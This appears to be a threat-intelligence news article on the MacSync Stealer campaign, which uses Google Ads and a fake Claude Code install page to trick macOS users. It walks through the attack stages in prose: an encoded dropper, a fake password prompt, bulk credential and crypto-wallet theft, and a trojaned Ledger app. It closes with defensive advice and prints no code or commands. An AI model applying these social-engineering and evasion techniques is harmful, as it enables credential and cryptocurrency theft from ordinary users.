Weaponized Google Ads Install Malicious Claude Code to Hijack macOS
Key Takeaways A sophisticated “MacSync Stealer” campaign is targeting macOS users via weaponized Google Ads promoting a fake Anthropic Claude Code CLI. The malware harvests a wide array...
Key Takeaways
- A sophisticated “MacSync Stealer” campaign is targeting macOS users via weaponized Google Ads promoting a fake Anthropic Claude Code CLI.
- The malware harvests a wide array of credentials, including macOS login passwords, browser data, cryptocurrency wallet details, and developer secrets.
- It also persistently compromises Ledger Live and Ledger Wallet apps by replacing their legitimate code with malicious versions designed to phish seed phrases.
- The attack leverages social engineering and exploits the trusted nature of Google services to bypass automated security measures.
- A design flaw in the malware’s execution provides a narrow window for victims to interrupt the attack chain and prevent data exfiltration and wallet compromise.
Cybersecurity researchers have uncovered an active campaign leveraging deceptive Google advertisements to distribute “MacSync Stealer,” a potent macOS credential harvesting malware. This threat specifically targets developers and cryptocurrency holders by impersonating Anthropic’s Claude Code command-line interface, ultimately aiming to steal sensitive data and hijack hardware wallet applications.
Table Of Content
- Key Takeaways
- The Deceptive Lure: Weaponized Google Ads
- The Attack Chain: From Ad Click to Wallet Hijack
- Stage One: The Covert Dropper
- Stage Two: Stealing the macOS Password
- Stage Three: Comprehensive Data Harvesting
- Trojaning Ledger Live and Ledger Wallet Applications
- A Design Flaw That Benefits Victims
- What This Means for Developers
- What You Should Do
The campaign, meticulously reverse-engineered by analysts at Beelzebub Labs using their Caronte threat-intel platform, came to light after a suspicious terminal command was submitted for analysis. Their findings reveal a multi-stage attack designed to appear legitimate while silently compromising user systems.
The Deceptive Lure: Weaponized Google Ads
The initial vector for this attack is a sponsored Google ad. When users searched for terms like “claude code mac install,” a malicious advertisement titled “Install Claude macOS” appeared, often ranking above the official Anthropic listing. This prime placement lends an air of legitimacy, encouraging unsuspecting users to click.
Clicking the sponsored ad redirects victims to a meticulously crafted fake installation page hosted on Google Sites. This page mimics Anthropic’s official branding, complete with a fabricated “12M+ downloads” counter and a prominent “one-click copy” button for a malicious terminal command.
The choice of Google Sites as a hosting platform is a strategic move by the attackers. Google Sites renders content using JavaScript. This means automated security scanners and corporate proxies that fetch pages without executing JavaScript will only see an empty shell, often marking the link as safe. However, a human user’s browser executes the script, loading the full, convincing fake page. This, combined with the trusted sites.google.com domain, which is typically on most allowlists, creates a highly effective lure that evades automated detection while appearing legitimate to real users.
Adding another layer of social engineering, the fake page includes a “New to Terminal?” walkthrough for less experienced users. This guide features a simulated installation animation that explicitly displays “Write admin password: **** ✓.” This seemingly innocuous step is a deliberate tactic to prime victims, teaching them that entering an administrator password is a normal and expected part of the Claude Code installation process. Consequently, when a fake password dialog appears later in the attack, victims are less likely to be suspicious, believing they are simply following the instructions they were just given.
The Attack Chain: From Ad Click to Wallet Hijack
The compromise unfolds through a meticulously orchestrated six-stage process, transitioning from an initial ad click to comprehensive credential theft and, for cryptocurrency users, a persistent hardware wallet hijack.
- Sponsored Google Ad: A paid search result masquerades as the legitimate Claude Code CLI for developer-centric search queries.
- Fake Install Page: A Google Sites page, designed to closely resemble Anthropic’s official website, hosts a pre-loaded malicious terminal command.
- Terminal Command: The victim pastes a Base64-encoded command, initiating a three-stage zsh dropper.
- Fake Password Dialog: A convincing System Preferences-style popup appears, designed to steal the user’s macOS login password.
- Credential Harvest: The stolen password is used to unlock keychains, browsers, wallet extensions, and developer credentials for exfiltration.
- Ledger App Trojan: If a Ledger hardware wallet application is present, its code is silently replaced with a malicious version to phish seed phrases on subsequent launches.
Each stage is interdependent, meaning the entire chain can be disrupted. Crucially, as detailed below, victims who reboot or close their laptops before certain blocking steps are completed can entirely bypass the credential archiving and wallet trojan stages.
Stage One: The Covert Dropper
The initial Base64-encoded command, once decoded, executes a simple curl-and-execute chain. This silently downloads a file, often named after the malware’s hash and tagged with .daily, suggesting a rotating payload. This downloaded file contains an inline, base64- and gzip-compressed script, executed using eval. The attackers employ basic obfuscation techniques, randomizing variable names and payload identifiers with each build to circumvent simple antivirus string matching.
The final decoded script operates completely silently, redirecting all output away from the terminal. Its primary functions are to fetch and execute the core credential-stealing payload and, subsequently, to upload the harvested data to the attacker’s server in smaller chunks.
Stage Two: Stealing the macOS Password
The core credential-stealing payload, written in AppleScript, identifies itself internally as “MacSync Stealer version 1.1.2, build tag ‘claude1’,” explicitly linking it to the Claude Code lure. Its first action is to force-quit Terminal, thereby erasing the malicious command from the visible shell history before the victim can inspect it.
The malware then focuses on acquiring the macOS login password. It employs a cunning trick: using a built-in macOS command that validates a password without triggering any system prompt, the script silently tests whatever the victim types. It displays a fake dialog window, meticulously styled to resemble a genuine “System Preferences” prompt, complete with Apple’s authentic lock icon. The script continuously loops, waiting for the user to enter the correct password. Once validated, this password is immediately leveraged to unlock the Mac’s encrypted keychain and extract the master key protecting “Chrome Safe Storage,” the mechanism used by Chromium-based browsers to encrypt saved passwords.
Even security-conscious users who later deny the legitimate macOS keychain permission prompt are still vulnerable. The attacker will have already obtained the full keychain file and the stolen password necessary to decrypt it offline.
Stage Three: Comprehensive Data Harvesting
With the single macOS login password, the malware proceeds to systematically collect an extensive range of sensitive data. This includes saved logins from over fourteen Chromium-based browsers and several Firefox-based browsers, credentials from more than 80 cryptocurrency browser wallet extensions and over 20 desktop wallet applications, SSH keys, AWS and Kubernetes configuration files, Telegram desktop sessions, Safari history, Apple Notes, and sensitive documents (PDFs, key files, VPN configurations) located in the Desktop, Documents, and Downloads folders. All this harvested data is compressed into a single archive for exfiltration.
Trojaning Ledger Live and Ledger Wallet Applications
For users with Ledger Live or Ledger Wallet installed, the malware goes beyond simple data theft. It downloads a modified version of the app’s internal Electron code and replaces the original, then re-signs the application to prevent macOS from flagging it as damaged. This constitutes a persistent hijack: every subsequent launch of Ledger Live or Ledger Wallet will now execute the attacker’s code.
Hidden within this modified code is a single injected instruction, accompanied by a Russian-language comment meaning “insert here.” Approximately five seconds after the compromised app opens (allowing the legitimate interface to load and reassure the user), the entire window silently redirects to a fake “recovery” flow. This flow is expertly crafted using Ledger’s own official onboarding artwork, guiding the victim through a fabricated device error and prompting them to re-enter their recovery seed phrase to “fix” it. This act ultimately grants the attacker full control over the victim’s cryptocurrency wallet.
A Design Flaw That Benefits Victims
During their analysis, Beelzebub Labs researchers identified a significant vulnerability in the malware’s design. Both the wallet trojan and the exfiltration of stolen data are contingent upon the victim interacting with a final popup – a fake error message stating, “Your Mac does not support this application.” Due to the underlying script’s construction, the execution pauses entirely at this dialog and cannot proceed until the victim clicks through it.
This critical flaw means that any user who force-quits Terminal, closes their laptop, or restarts their Mac before clicking this final popup effectively interrupts the attack chain. This prevents any data from leaving the machine and any wallet applications from being tampered with. The temporary staging folder used by the malware is automatically wiped upon a macOS reboot. This situation presents a peculiar instance where the attacker’s own social engineering tactic – designed to make victims quietly dismiss the “error” – inadvertently provides cautious users with an escape route.
Furthermore, the data exfiltration process itself exhibits fragility. Stolen data is uploaded in small, ten-megabyte chunks over an unencrypted connection. If even a single piece fails to arrive due to factors like a dropped Wi-Fi connection, a reboot, or a firewall, the entire archive becomes unreadable to the attacker due to the internal structure of zip files.
What This Means for Developers
Beelzebub reported the malicious advertisement to Google, which promptly removed it within 24 hours for violating advertising policies. However, the operators behind this campaign are known to frequently rotate their lure URLs to evade takedowns.
The primary takeaway for developers and all macOS users is clear: always obtain command-line developer tools and any software directly from official vendor websites, never from links in search advertisements. Any copy-pasted terminal command containing encoded or obfuscated text should be treated as an immediate and serious red flag, regardless of how legitimate the surrounding web page appears.
What You Should Do
- Verify Download Sources: Always download software, especially developer tools and cryptocurrency applications, directly from the official vendor’s website. Avoid links from search ads, third-party download sites, or unverified sources.
- Scrutinize Terminal Commands: Be highly suspicious of any terminal command that is obfuscated, Base64-encoded, or otherwise appears complex and non-transparent. Understand what a command does before executing it.
- Monitor for Suspicious Pop-ups: If an unexpected password prompt or error message appears during a software installation, especially if it asks for your macOS admin password, proceed with extreme caution. Verify its legitimacy before entering any credentials.
- Reboot Your Mac: If you suspect you’ve executed a malicious command or are in the middle of a suspicious installation, immediately reboot your Mac. This can disrupt the attack chain and prevent data exfiltration or wallet compromises.
- Change Passwords: If you believe you may have fallen victim to this attack, immediately change your macOS login password, as well as any passwords saved in your browsers or used for developer services (e.g., AWS, Kubernetes, SSH).
- Check Cryptocurrency Wallets: Regularly monitor your cryptocurrency wallet balances and transaction history for any unauthorized activity. If you use Ledger Live or Ledger Wallet and suspect compromise, consider migrating funds to a new, secure wallet and reinstalling the applications from official sources.
- Enable Multi-Factor Authentication (MFA): Implement MFA wherever possible, especially for critical accounts, developer platforms, and cryptocurrency exchanges.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.